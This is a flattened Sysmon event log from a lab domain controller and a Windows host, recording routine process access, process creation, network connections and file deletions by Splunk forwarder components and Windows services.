10341000x8000000000000000284663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0D9A-6216-9004-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.188{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D9A-6216-9004-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:02.189{C8EA50B7-0D9A-6216-9004-000000003802}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000284657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:59.556{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53192-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000213765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:03.727{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1C13A158A9A07521AE50D754D176F02,SHA256=8C8416AF54B70BE9ABDBDFB0537D99A37DF746A17705EB616DA2AED2E0B5C50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:03.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37863969DC8F7356BDDCC892BB40B4FD,SHA256=81A0CEB0BD930E7F3FC5311088C1D6671F60BC70F1FF7B1303CD9EAF93E4B7F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:01.601{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51142-false10.0.1.12-8000- 23542300x8000000000000000284677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:03.203{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3833AB64C1038153AE483919B6885FCB,SHA256=798718CAC6A0E6D9F54EFE6DAEFEDDE7E332177EE47F3B338BB0F32DA2C3A2EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:03.203{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94C217D1BB3E5963A0DF12D4DC173C82,SHA256=D739C3B76CA5E47CA22FC558A77934D920B5DA1231EFEAB227AE34E001D4B784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:04.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49EEAD991FF382CB772A5CC4637C678,SHA256=4AC147D8B93F079B56932A32D70060F834BD310657738961AB8A3319CE34400C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.703{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F003663400F72ABF14F121ACBCED1604,SHA256=E93F800BF3AE349B673EFA9B5ED0E2544EB7BFC8B5AFBFC8CD0FECF69C1E0476,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.610{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3833AB64C1038153AE483919B6885FCB,SHA256=798718CAC6A0E6D9F54EFE6DAEFEDDE7E332177EE47F3B338BB0F32DA2C3A2EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D9C-6216-9204-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0D9C-6216-9204-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.266{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D9C-6216-9204-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:04.267{C8EA50B7-0D9C-6216-9204-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:05.704{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73CD9E7EBCE003F4C23F5B30A3D68229,SHA256=93E53DB727C201D982787B86F390E8AE12508C3D0E2A02861F9C46A486715CBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:03.057{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53193-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:03.057{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53193-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000284692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:06.719{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E6D0DFBB6EA121E791159DB4E8A98B0,SHA256=5F902F8E8EB9DC0C10FAC35EC2AA4227C5AFBB908FA3D9FEB4F135C26B9F868E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:06.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0262F55DB8BD5C3F8E883C53832DB4E,SHA256=34E81ECABA457B03B5B99D8B77A247D51436CB2F42EADBDE63E1793D48F42AF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:07.735{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D1A792175F323DCBA269D91202B6D1A,SHA256=85319A8AE61C00A093B9C4B221520FDE49E708F7D016806704AB4CAC05F8B5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:07.258{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12EE3277EEA1C9279AC50AEA2FE47C38,SHA256=E2693EBDB68693B9FCDFEF50C6F6800709797D5B0ED413762820CB397E8F6959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:08.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25C87799BC33F49295CB9E065848EBD6,SHA256=C65A00053876CA5FE726A993E80AEF4DB8C24453BE19BF0D0E8A9F70189E66C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:06.601{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51143-false10.0.1.12-8000- 23542300x8000000000000000213769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:08.258{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A47D6B856B0F73D4302F11A86884FC7,SHA256=3FB0E35F346F28B4395833F3F0C3A83F31EECE51F89E5C2480FBBBC06EE7FA6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:05.619{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53194-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:09.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E12F73C2BDB54088B8CCEBD61DA2C6F,SHA256=AB3810700C437ABEFC84D66721EBF01F7FC6A60D9A675F9FF7DF3F177B6324B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:09.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=438AE0399929C0EE12D538DCB04FBF36,SHA256=31701BB564FFB4B8B4CDAF0C61B704EC535445301F1877E831E50A42AB2AB2A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:10.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A457742B937EAF2F1FA3B810F9744D,SHA256=CC5FCDC312BE6439687590708F53D90EDA073EF3BB935D17832201752A9E4CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:10.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5345D2AB6472EA633CDA4A3483B1B2DC,SHA256=F4F962B5640A1442E3BEF02590094475E23C5506775160DF9455F7093E51A500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:11.828{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CD7D2F2D14B8D73AEEF4F3AEFB87F5,SHA256=D6329745D18C9F7F589DA819C35C9ACC472087FA95DA908FFC65BDA8ACA8B774,IMPHASH=00000000000000000000000000000000falsetrue 